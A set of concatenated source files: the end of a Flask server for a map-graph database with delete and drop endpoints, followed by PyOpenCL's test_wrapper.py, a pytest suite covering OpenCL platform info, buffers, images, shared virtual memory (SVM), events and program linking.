@app.route("/api/0.5/delete_graph") def delete_graph(): logging.warning('Server. Удаление графа из БД.') map_graph.delete_graph() return json.dumps({ 'error': False, 'data': {}, 'msg': "Graph has been deleted" }) @app.route("/api/0.5/drop") def drop(): logging.warning('Server. Удаление БД.') db_client.nodes.drop() db_client.ways.drop() handler.create_indexes() config.set_bounds([]) return json.dumps({ 'error': False, 'data': {}, 'msg': "DB has been dropped" }) app.run(host=config.get_ip(), port=config.get_port(), debug=True)
test_wrapper.py
__copyright__ = "Copyright (C) 2009 Andreas Kloeckner" __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ # avoid spurious: pytest.mark.parametrize is not callable # pylint: disable=not-callable import numpy as np import numpy.linalg as la import pytest import pyopencl as cl import pyopencl.array as cl_array import pyopencl.cltypes as cltypes import pyopencl.clrandom from pyopencl.tools import ( # noqa pytest_generate_tests_for_pyopencl as pytest_generate_tests, ImmediateAllocator, DeferredAllocator) from pyopencl.characterize import get_pocl_version # Are CL implementations crashy? You be the judge. :) try: import faulthandler # noqa except ImportError: pass else: faulthandler.enable() def _xfail_if_pocl(plat, up_to_version, msg="unsupported by pocl"): if plat.vendor == "The pocl project": if up_to_version is None or get_pocl_version(plat) <= up_to_version: pytest.xfail(msg) def _xfail_if_pocl_gpu(device, what): if device.platform.vendor == "The pocl project" \ and device.type & cl.device_type.GPU: pytest.xfail(f"POCL's {what} support don't work right on Nvidia GPUs, " "at least the Titan V, as of pocl 1.6, 2021-01-20") def test_get_info(ctx_factory): ctx = ctx_factory() device, = ctx.devices platform = device.platform device.persistent_unique_id device.hashable_model_and_version_identifier failure_count = [0] pocl_quirks = [ (cl.Buffer, cl.mem_info.OFFSET), (cl.Program, cl.program_info.BINARIES), (cl.Program, cl.program_info.BINARY_SIZES), ] if ctx._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2): pocl_quirks.extend([ (cl.Program, cl.program_info.KERNEL_NAMES), (cl.Program, cl.program_info.NUM_KERNELS), ]) CRASH_QUIRKS = [ # noqa (("NVIDIA Corporation", "NVIDIA CUDA", "OpenCL 1.0 CUDA 3.0.1"), [ (cl.Event, cl.event_info.COMMAND_QUEUE), ]), (("NVIDIA Corporation", "NVIDIA CUDA", "OpenCL 1.2 CUDA 7.5"), [ (cl.Buffer, getattr(cl.mem_info, "USES_SVM_POINTER", None)), ]), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.8-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.8"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.9-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.9"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.10-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.10"), pocl_quirks), (("Apple", "Apple", "OpenCL 1.2"), [ (cl.Program, cl.program_info.SOURCE), ]), ] QUIRKS = [] # noqa def find_quirk(quirk_list, cl_obj, info): for (vendor, name, version), quirks in quirk_list: if ( vendor == platform.vendor and name == platform.name and platform.version.startswith(version)): for quirk_cls, quirk_info in quirks: if (isinstance(cl_obj, quirk_cls) and quirk_info == info): return True return False def do_test(cl_obj, info_cls, func=None, try_attr_form=True): if func is None: func = cl_obj.get_info for info_name in dir(info_cls): if not info_name.startswith("_") and info_name != "to_string": print(info_cls, info_name) info = getattr(info_cls, info_name) if find_quirk(CRASH_QUIRKS, cl_obj, info): print("not executing get_info", type(cl_obj), info_name) print("(known crash quirk for %s)" % platform.name) continue try: func(info) except Exception: msg = "failed get_info", type(cl_obj), info_name if find_quirk(QUIRKS, cl_obj, info): msg += ("(known quirk for %s)" % platform.name) else: failure_count[0] += 1 if try_attr_form: try: getattr(cl_obj, info_name.lower()) except Exception: print("failed attr-based get_info", type(cl_obj), info_name) if find_quirk(QUIRKS, cl_obj, info): print("(known quirk for %s)" % platform.name) else: failure_count[0] += 1 do_test(platform, cl.platform_info) do_test(device, cl.device_info) do_test(ctx, cl.context_info) props = 0 if (device.queue_properties & cl.command_queue_properties.PROFILING_ENABLE): profiling = True props = cl.command_queue_properties.PROFILING_ENABLE queue = cl.CommandQueue(ctx, properties=props) do_test(queue, cl.command_queue_info) prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() do_test(prg, cl.program_info) do_test(prg, cl.program_build_info, lambda info: prg.get_build_info(device, info), try_attr_form=False) n = 2000 a_buf = cl.Buffer(ctx, 0, n*4) do_test(a_buf, cl.mem_info) kernel = prg.all_kernels()[0] do_test(kernel, cl.kernel_info) for i in range(2): # exercise cache for info_name in dir(cl.kernel_work_group_info): if not info_name.startswith("_") and info_name != "to_string": try: print("kernel_wg_info: %s" % info_name) kernel.get_work_group_info( getattr(cl.kernel_work_group_info, info_name), device) except cl.LogicError as err: print("<error: %s>" % err) evt = kernel(queue, (n,), None, a_buf) do_test(evt, cl.event_info) if profiling: evt.wait() do_test(evt, cl.profiling_info, lambda info: evt.get_profiling_info(info), try_attr_form=False) # crashes on intel... # and pocl does not support CL_ADDRESS_CLAMP if device.image_support and platform.vendor not in [ "Intel(R) Corporation", "The pocl project", ]: smp = cl.Sampler(ctx, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) do_test(smp, cl.sampler_info) img_format = cl.get_supported_image_formats( ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0] img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256)) assert img.shape == (128, 256) img.depth img.image.depth do_test(img, cl.image_info, lambda info: img.get_image_info(info)) def test_int_ptr(ctx_factory): def do_test(obj): new_obj = type(obj).from_int_ptr(obj.int_ptr) assert obj == new_obj assert type(obj) is type(new_obj) ctx = ctx_factory() device, = ctx.devices platform = device.platform do_test(device) do_test(platform) do_test(ctx) queue = cl.CommandQueue(ctx) do_test(queue) evt = cl.enqueue_marker(queue) do_test(evt) prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() do_test(prg) do_test(prg.sum) n = 2000 a_buf = cl.Buffer(ctx, 0, n*4) do_test(a_buf) # crashes on intel... # and pocl does not support CL_ADDRESS_CLAMP if device.image_support and platform.vendor not in [ "Intel(R) Corporation", "The pocl project", ]: smp = cl.Sampler(ctx, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) do_test(smp) img_format = cl.get_supported_image_formats( ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0] img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256)) do_test(img) def test_invalid_kernel_names_cause_failures(ctx_factory): ctx = ctx_factory() device = ctx.devices[0] prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() try: prg.sam raise RuntimeError("invalid kernel name did not cause error") except AttributeError: pass except RuntimeError: if "Intel" in device.platform.vendor: from pytest import xfail xfail("weird exception from OpenCL implementation " "on invalid kernel name--are you using " "Intel's implementation? (if so, known bug in Intel CL)") else: raise def test_image_format_constructor(): # doesn't need image support to succeed iform = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT) assert iform.channel_order == cl.channel_order.RGBA assert iform.channel_data_type == cl.channel_type.FLOAT if not cl._PYPY: assert not hasattr(iform, "__dict__") def test_device_topology_amd_constructor(): # doesn't need cl_amd_device_attribute_query support to succeed topol = cl.DeviceTopologyAmd(3, 4, 5) assert topol.bus == 3 assert topol.device == 4 assert topol.function == 5 if not cl._PYPY: assert not hasattr(topol, "__dict__") def test_nonempty_supported_image_formats(ctx_factory): context = ctx_factory() device = context.devices[0] if device.image_support: assert len(cl.get_supported_image_formats( context, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)) > 0 else: from pytest import skip skip("images not supported on %s" % device.name) def test_that_python_args_fail(ctx_factory): context = ctx_factory() prg = cl.Program(context, """ __kernel void mult(__global float *a, float b, int c) { a[get_global_id(0)] *= (b+c); } """).build() a = np.random.rand(50000) queue = cl.CommandQueue(context) mf = cl.mem_flags a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) knl = cl.Kernel(prg, "mult") try: knl(queue, a.shape, None, a_buf, 2, 3) assert False, "PyOpenCL should not accept bare Python types as arguments" except cl.LogicError: pass try: prg.mult(queue, a.shape, None, a_buf, float(2), 3) assert False, "PyOpenCL should not accept bare Python types as arguments" except cl.LogicError: pass prg.mult(queue, a.shape, None, a_buf, np.float32(2), np.int32(3)) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_buf, a_result).wait() def test_image_2d(ctx_factory): context = ctx_factory() device, = context.devices if not device.image_support: from pytest import skip skip("images not supported on %s" % device) if "Intel" in device.vendor and "31360.31426" in device.version: from pytest import skip skip("images crashy on %s" % device) _xfail_if_pocl(device.platform, None, "pocl does not support CL_ADDRESS_CLAMP") prg = cl.Program(context, """ __kernel void copy_image( __global float *dest, __read_only image2d_t src, sampler_t samp, int stride0) { int d0 = get_global_id(0); int d1 = get_global_id(1); /* const sampler_t samp = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP | CLK_FILTER_NEAREST; */ dest[d0*stride0 + d1] = read_imagef(src, samp, (float2)(d1, d0)).x; } """).build() num_channels = 1 a = np.random.rand(1024, 512, num_channels).astype(np.float32) if num_channels == 1: a = a[:, :, 0] queue = cl.CommandQueue(context) try: a_img = cl.image_from_array(context, a, num_channels) except cl.RuntimeError: import sys exc = sys.exc_info()[1] if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED: from pytest import skip skip("required image format not supported on %s" % device.name) else: raise a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes) samp = cl.Sampler(context, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) prg.copy_image(queue, a.shape, None, a_dest, a_img, samp, np.int32(a.strides[0]/a.dtype.itemsize)) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_result, a_dest) good = la.norm(a_result - a) == 0 if not good: if queue.device.type & cl.device_type.CPU: assert good, ("The image implementation on your CPU CL platform '%s' " "returned bad values. This is bad, but common." % queue.device.platform) else: assert good def test_image_3d(ctx_factory): #test for image_from_array for 3d image of float2 context = ctx_factory() device, = context.devices if not device.image_support: from pytest import skip skip("images not supported on %s" % device) if device.platform.vendor == "Intel(R) Corporation": from pytest import skip skip("images crashy on %s" % device) _xfail_if_pocl(device.platform, None, "pocl does not support CL_ADDRESS_CLAMP") prg = cl.Program(context, """ __kernel void copy_image_plane( __global float2 *dest, __read_only image3d_t src, sampler_t samp, int stride0, int stride1) { int d0 = get_global_id(0); int d1 = get_global_id(1); int d2 = get_global_id(2); /* const sampler_t samp = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP | CLK_FILTER_NEAREST; */ dest[d0*stride0 + d1*stride1 + d2] = read_imagef( src, samp, (float4)(d2, d1, d0, 0)).xy; } """).build() num_channels = 2 shape = (3, 4, 2) a = np.random.random(shape + (num_channels,)).astype(np.float32) queue = cl.CommandQueue(context) try: a_img = cl.image_from_array(context, a, num_channels) except cl.RuntimeError: import sys exc = sys.exc_info()[1] if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED: from pytest import skip skip("required image format not supported on %s" % device.name) else: raise a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes) samp = cl.Sampler(context, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) prg.copy_image_plane(queue, shape, None, a_dest, a_img, samp, np.int32(a.strides[0]/a.itemsize/num_channels), np.int32(a.strides[1]/a.itemsize/num_channels), ) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_result, a_dest) good = la.norm(a_result - a) == 0 if not good: if queue.device.type & cl.device_type.CPU: assert good, ("The image implementation on your CPU CL platform '%s' " "returned bad values. This is bad, but common." % queue.device.platform) else: assert good def test_copy_buffer(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) mf = cl.mem_flags a = np.random.rand(50000).astype(np.float32) b = np.empty_like(a) buf1 = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a) buf2 = cl.Buffer(context, mf.WRITE_ONLY, b.nbytes) cl.enqueue_copy(queue, buf2, buf1).wait() cl.enqueue_copy(queue, b, buf2).wait() assert la.norm(a - b) == 0 def test_mempool(ctx_factory): from pyopencl.tools import MemoryPool, ImmediateAllocator context = ctx_factory() queue = cl.CommandQueue(context) pool = MemoryPool(ImmediateAllocator(queue)) alloc_queue = [] e0 = 12 for e in range(e0-6, e0-4): for i in range(100): alloc_queue.append(pool.allocate(1 << e)) if len(alloc_queue) > 10: alloc_queue.pop(0) del alloc_queue pool.stop_holding() def test_mempool_2(ctx_factory): from pyopencl.tools import MemoryPool, ImmediateAllocator from random import randrange context = ctx_factory() queue = cl.CommandQueue(context) pool = MemoryPool(ImmediateAllocator(queue)) for i in range(2000): s = randrange(1 << 31) >> randrange(32) bin_nr = pool.bin_number(s) asize = pool.alloc_size(bin_nr) assert asize >= s, s assert pool.bin_number(asize) == bin_nr, s assert asize < asize*(1+1/8) @pytest.mark.parametrize("allocator_cls", [ImmediateAllocator, DeferredAllocator]) def test_allocator(ctx_factory, allocator_cls): context = ctx_factory() queue = cl.CommandQueue(context) if allocator_cls is DeferredAllocator: allocator = allocator_cls(context) else: allocator = allocator_cls(queue) mem = allocator(15) mem2 = allocator(0) assert mem is not None assert mem2 is None def test_vector_args(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) prg = cl.Program(context, """ __kernel void set_vec(float4 x, __global float4 *dest) { dest[get_global_id(0)] = x; } """).build() x = cltypes.make_float4(1, 2, 3, 4) dest = np.empty(50000, cltypes.float4) mf = cl.mem_flags dest_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=dest) prg.set_vec(queue, dest.shape, None, x, dest_buf) cl.enqueue_copy(queue, dest, dest_buf).wait() assert (dest == x).all() def test_header_dep_handling(ctx_factory): context = ctx_factory() from os.path import exists assert exists("empty-header.h") # if this fails, change dir to pyopencl/test kernel_src = """ #include <empty-header.h> kernel void zonk(global int *a) { *a = 5; } """ import os cl.Program(context, kernel_src).build(["-I", os.getcwd()]) cl.Program(context, kernel_src).build(["-I", os.getcwd()]) def test_context_dep_memoize(ctx_factory): context = ctx_factory() from pyopencl.tools import context_dependent_memoize counter = [0] @context_dependent_memoize def do_something(ctx): counter[0] += 1 do_something(context) do_something(context) assert counter[0] == 1 def test_can_build_and_run_binary(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) device = queue.device program = cl.Program(ctx, """ __kernel void simple(__global float *in, __global float *out) { out[get_global_id(0)] = in[get_global_id(0)]; }""") program.build() binary = program.get_info(cl.program_info.BINARIES)[0] foo = cl.Program(ctx, [device], [binary]) foo.build() n = 256 a_dev = cl.clrandom.rand(queue, n, np.float32) dest_dev = cl_array.empty_like(a_dev) foo.simple(queue, (n,), (16,), a_dev.data, dest_dev.data) def test_enqueue_barrier_marker(ctx_factory): ctx = ctx_factory() # Still relevant on pocl 1.0RC1. _xfail_if_pocl( ctx.devices[0].platform, (1, 0), "pocl crashes on enqueue_barrier") queue = cl.CommandQueue(ctx) if queue._get_cl_version() >= (1, 2) and cl.get_cl_header_version() <= (1, 1): pytest.skip("CL impl version >= 1.2, header version <= 1.1--cannot be sure " "that clEnqueueWaitForEvents is implemented") cl.enqueue_barrier(queue) evt1 = cl.enqueue_marker(queue) evt2 = cl.enqueue_marker(queue, wait_for=[evt1]) cl.enqueue_barrier(queue, wait_for=[evt1, evt2]) def test_wait_for_events(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) evt1 = cl.enqueue_marker(queue) evt2 = cl.enqueue_marker(queue) cl.wait_for_events([evt1, evt2]) def test_unload_compiler(platform): if (platform._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2)): from pytest import skip skip("clUnloadPlatformCompiler is only available in OpenCL 1.2") _xfail_if_pocl(platform, (0, 13), "pocl does not support unloading compiler") if platform.vendor == "Intel(R) Corporation": from pytest import skip skip("Intel proprietary driver does not support unloading compiler") cl.unload_platform_compiler(platform) def test_platform_get_devices(ctx_factory): ctx = ctx_factory() platform = ctx.devices[0].platform if platform.name == "Apple": pytest.xfail("Apple doesn't understand all the values we pass " "for dev_type") dev_types = [cl.device_type.ACCELERATOR, cl.device_type.ALL, cl.device_type.CPU, cl.device_type.DEFAULT, cl.device_type.GPU] if (platform._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2) and not platform.name.lower().startswith("nvidia")): dev_types.append(cl.device_type.CUSTOM) for dev_type in dev_types: print(dev_type) devs = platform.get_devices(dev_type) if dev_type in (cl.device_type.DEFAULT, cl.device_type.ALL, getattr(cl.device_type, "CUSTOM", None)): continue for dev in devs: assert dev.type & dev_type == dev_type def test_user_event(ctx_factory): ctx = ctx_factory() if (ctx._get_cl_version() < (1, 1) and cl.get_cl_header_version() < (1, 1)): from pytest import skip skip("UserEvent is only available in OpenCL 1.1") # https://github.com/pocl/pocl/issues/201 _xfail_if_pocl(ctx.devices[0].platform, (0, 13), "pocl's user events don't work right") status = {} def event_waiter1(e, key): e.wait() status[key] = True def event_waiter2(e, key): cl.wait_for_events([e]) status[key] = True from threading import Thread from time import sleep evt = cl.UserEvent(ctx) Thread(target=event_waiter1, args=(evt, 1)).start() sleep(.05) if status.get(1, False): raise RuntimeError("UserEvent triggered before set_status") evt.set_status(cl.command_execution_status.COMPLETE) sleep(.05) if not status.get(1, False): raise RuntimeError("UserEvent.wait timeout") assert evt.command_execution_status == cl.command_execution_status.COMPLETE evt = cl.UserEvent(ctx) Thread(target=event_waiter2, args=(evt, 2)).start() sleep(.05) if status.get(2, False): raise RuntimeError("UserEvent triggered before set_status") evt.set_status(cl.command_execution_status.COMPLETE) sleep(.05) if not status.get(2, False): raise RuntimeError("cl.wait_for_events timeout on UserEvent") assert evt.command_execution_status == cl.command_execution_status.COMPLETE def test_buffer_get_host_array(ctx_factory): if cl._PYPY: # FIXME pytest.xfail("Buffer.get_host_array not yet working on pypy") ctx = ctx_factory() mf = cl.mem_flags host_buf = np.random.rand(25).astype(np.float32) buf = cl.Buffer(ctx, mf.READ_WRITE | mf.USE_HOST_PTR, hostbuf=host_buf) host_buf2 = buf.get_host_array(25, np.float32) assert (host_buf == host_buf2).all() assert (host_buf.__array_interface__["data"][0] == host_buf.__array_interface__["data"][0]) assert host_buf2.base is buf buf = cl.Buffer(ctx, mf.READ_WRITE | mf.ALLOC_HOST_PTR, size=100) try: host_buf2 = buf.get_host_array(25, np.float32) assert False, ("MemoryObject.get_host_array should not accept buffer " "without USE_HOST_PTR") except cl.LogicError: pass host_buf = np.random.rand(25).astype(np.float32) buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=host_buf) try: host_buf2 = buf.get_host_array(25, np.float32) assert False, ("MemoryObject.get_host_array should not accept buffer " "without USE_HOST_PTR") except cl.LogicError: pass def test_program_valued_get_info(ctx_factory): ctx = ctx_factory() prg = cl.Program(ctx, """ __kernel void reverse(__global float *out) { out[get_global_id(0)] *= 2; } """).build() knl = prg.reverse assert knl.program == prg knl.program.binaries[0] def test_event_set_callback(ctx_factory): import sys if sys.platform.startswith("win"): pytest.xfail("Event.set_callback not present on Windows") ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "event callbacks") if ctx._get_cl_version() < (1, 1): pytest.skip("OpenCL 1.1 or newer required for set_callback") a_np = np.random.rand(50000).astype(np.float32) b_np = np.random.rand(50000).astype(np.float32) got_called = [] def cb(status): got_called.append(status) mf = cl.mem_flags a_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np) b_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=b_np) prg = cl.Program(ctx, """ __kernel void sum(__global const float *a_g, __global const float *b_g, __global float *res_g) { int gid = get_global_id(0); res_g[gid] = a_g[gid] + b_g[gid]; } """).build() res_g = cl.Buffer(ctx, mf.WRITE_ONLY, a_np.nbytes) uevt = cl.UserEvent(ctx) evt = prg.sum(queue, a_np.shape, None, a_g, b_g, res_g, wait_for=[uevt]) evt.set_callback(cl.command_execution_status.COMPLETE, cb) uevt.set_status(cl.command_execution_status.COMPLETE) queue.finish() counter = 0 # yuck while not got_called: from time import sleep sleep(0.01) # wait up to five seconds (?!) counter += 1 if counter >= 500: break assert got_called def test_global_offset(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) _xfail_if_pocl_gpu(queue.device, "global offset") prg = cl.Program(context, """ __kernel void mult(__global float *a) { a[get_global_id(0)] *= 2; } """).build() n = 50 a = np.random.rand(n).astype(np.float32) queue = cl.CommandQueue(context) mf = cl.mem_flags a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) step = 10 for ofs in range(0, n, step): prg.mult(queue, (step,), None, a_buf, global_offset=(ofs,)) a_2 = np.empty_like(a) cl.enqueue_copy(queue, a_2, a_buf) assert (a_2 == 2*a).all() def test_sub_buffers(ctx_factory): ctx = ctx_factory() if (ctx._get_cl_version() < (1, 1) or cl.get_cl_header_version() < (1, 1)): from pytest import skip skip("sub-buffers are only available in OpenCL 1.1") alignment = ctx.devices[0].mem_base_addr_align queue = cl.CommandQueue(ctx) n = 30000 a = (np.random.rand(n) * 100).astype(np.uint8) mf = cl.mem_flags a_buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) start = (5000 // alignment) * alignment stop = start + 20 * alignment a_sub_ref = a[start:stop] a_sub = np.empty_like(a_sub_ref) cl.enqueue_copy(queue, a_sub, a_buf[start:stop]) assert np.array_equal(a_sub, a_sub_ref) def test_spirv(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) if (ctx._get_cl_version() < (2, 1) or cl.get_cl_header_version() < (2, 1)): pytest.skip("SPIR-V program creation only available " "in OpenCL 2.1 and higher") n = 50000 a_dev = cl.clrandom.rand(queue, n, np.float32) b_dev = cl.clrandom.rand(queue, n, np.float32) dest_dev = cl_array.empty_like(a_dev) with open("add-vectors-%d.spv" % queue.device.address_bits, "rb") as spv_file: spv = spv_file.read() prg = cl.Program(ctx, spv).build() if (not prg.all_kernels() and queue.device.platform.name.startswith("AMD Accelerated")): pytest.skip("SPIR-V program creation on AMD did not result in any kernels") prg.sum(queue, a_dev.shape, None, a_dev.data, b_dev.data, dest_dev.data) assert la.norm((dest_dev - (a_dev+b_dev)).get()) < 1e-7 def test_coarse_grain_svm(ctx_factory): import sys is_pypy = "__pypy__" in sys.builtin_module_names ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "SVM") dev = ctx.devices[0] from pyopencl.characterize import has_coarse_grain_buffer_svm from pytest import skip if not has_coarse_grain_buffer_svm(queue.device): skip("device does not support coarse-grain SVM") if ("AMD" in dev.platform.name and dev.type & cl.device_type.CPU): pytest.xfail("AMD CPU doesn't do coarse-grain SVM") if ("AMD" in dev.platform.name and dev.type & cl.device_type.GPU): pytest.xfail("AMD GPU crashes on SVM unmap") n = 3000 svm_ary = cl.SVM(cl.csvm_empty(ctx, (n,), np.float32, alignment=64)) if not is_pypy: # https://bitbucket.org/pypy/numpy/issues/52 assert isinstance(svm_ary.mem.base, cl.SVMAllocation) cl.enqueue_svm_memfill(queue, svm_ary, np.zeros((), svm_ary.mem.dtype)) with svm_ary.map_rw(queue) as ary: ary.fill(17) orig_ary = ary.copy() prg = cl.Program(ctx, """ __kernel void twice(__global float *a_g) { a_g[get_global_id(0)] *= 2; } """).build() prg.twice(queue, svm_ary.mem.shape, None, svm_ary) with svm_ary.map_ro(queue) as ary: print(ary) assert np.array_equal(orig_ary*2, ary) new_ary = np.empty_like(orig_ary) new_ary.fill(-1) if ctx.devices[0].platform.name != "Portable Computing Language": # "Blocking memcpy is unimplemented (clEnqueueSVMMemcpy.c:61)" # in pocl up to and including 1.0rc1. cl.enqueue_copy(queue, new_ary, svm_ary) assert np.array_equal(orig_ary*2, new_ary) # {{{ https://github.com/inducer/pyopencl/issues/372 buf_arr = cl.svm_empty(ctx, cl.svm_mem_flags.READ_ONLY, 10, np.int32) out_arr = cl.svm_empty(ctx, cl.svm_mem_flags.READ_WRITE, 10, np.int32) svm_buf_arr = cl.SVM(buf_arr) svm_out_arr = cl.SVM(out_arr) with svm_buf_arr.map_rw(queue) as ary: ary.fill(17) prg_ro = cl.Program(ctx, r""" __kernel void twice_ro(__global int *out_g, __global int *in_g) { out_g[get_global_id(0)] = 2*in_g[get_global_id(0)]; } """).build() prg_ro.twice_ro(queue, buf_arr.shape, None, svm_out_arr, svm_buf_arr) with svm_out_arr.map_ro(queue) as ary: print(ary) # }}} def test_fine_grain_svm(ctx_factory): import sys is_pypy = "__pypy__" in sys.builtin_module_names ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "GPU SVM") from pyopencl.characterize import has_fine_grain_buffer_svm from pytest import skip if not has_fine_grain_buffer_svm(queue.device): skip("device does not support fine-grain SVM") n = 3000 ary = cl.fsvm_empty(ctx, n, np.float32, alignment=64) if not is_pypy: # https://bitbucket.org/pypy/numpy/issues/52 assert isinstance(ary.base, cl.SVMAllocation) ary.fill(17) orig_ary = ary.copy() prg = cl.Program(ctx, """ __kernel void twice(__global float *a_g) { a_g[get_global_id(0)] *= 2; } """).build() prg.twice(queue, ary.shape, None, cl.SVM(ary)) queue.finish() print(ary) assert np.array_equal(orig_ary*2, ary) @pytest.mark.parametrize("dtype", [ np.uint, cltypes.uint2, ]) def test_map_dtype(ctx_factory, dtype): if cl._PYPY: # FIXME pytest.xfail("enqueue_map_buffer not yet working on pypy") ctx = ctx_factory() queue = cl.CommandQueue(ctx) dt = np.dtype(dtype) b = pyopencl.Buffer(ctx, pyopencl.mem_flags.READ_ONLY, dt.itemsize) array, ev = pyopencl.enqueue_map_buffer(queue, b, pyopencl.map_flags.WRITE, 0, (1,), dt) with array.base: print(array.dtype) assert array.dtype == dt def test_compile_link(ctx_factory): ctx = ctx_factory() if ctx._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2): pytest.skip("Context and ICD loader must understand CL1.2 for compile/link") platform = ctx.devices[0].platform if platform.name == "Apple": pytest.skip("Apple doesn't like our compile/link test") queue = cl.CommandQueue(ctx) vsink_prg = cl.Program(ctx, """//CL// void value_sink(float x) { } """).compile() main_prg = cl.Program(ctx, """//CL// void value_sink(float x); __kernel void experiment() { value_sink(3.1415f + get_global_id(0)); } """).compile() z = cl.link_program(ctx, [vsink_prg, main_prg], devices=ctx.devices) z.experiment(queue, (128**2,), (128,)) queue.finish() def test_copy_buffer_rect(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "rectangular copies") arr1 = cl_array.zeros(queue, (2, 3), "f") arr2 = cl_array.zeros(queue, (4, 5), "f") arr1.fill(1) cl.enqueue_copy( queue, arr2.data, arr1.data, src_origin=(0, 0), dst_origin=(1, 1), region=arr1.shape[::-1]) def test_threaded_nanny_events(ctx_factory): # https://github.com/inducer/pyopencl/issues/296 import gc import threading def create_arrays_thread(n1=10, n2=20): ctx = ctx_factory() queue = cl.CommandQueue(ctx) for i1 in range(n2): for i in range(n1): acl = cl.array.zeros(queue, 10, dtype=np.float32) acl.get() # Garbage collection triggers the error print("collected ", str(gc.collect())) print("stats ", gc.get_stats()) t1 = threading.Thread(target=create_arrays_thread) t2 = threading.Thread(target=create_arrays_thread) t1.start() t2.start() t1.join() t2.join() @pytest.mark.parametrize("empty_shape", [(0,), (3, 0, 2)]) def test_empty_ndrange(ctx_factory, empty_shape): ctx = ctx_factory() queue = cl.CommandQueue(ctx) if ctx._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2): pytest.skip("OpenCL 1.2 required for empty NDRange suuport") a = cl_array.zeros(queue, empty_shape, dtype=np.float32) prg = cl.Program(ctx, """ __kernel void add_two(__global float *a_g) { a_g[get_global_id(0)] += 2; } """).build() prg.add_two(queue, a.shape, None, a.data, allow_empty_ndrange=True) if __name__ == "__main__": # make sure that import failures get reported, instead of skipping the tests. import pyopencl # noqa import sys if len(sys.argv) > 1: exec(sys.argv[1]) else: from pytest import main main([__file__])
test_multi_processing_approach.py
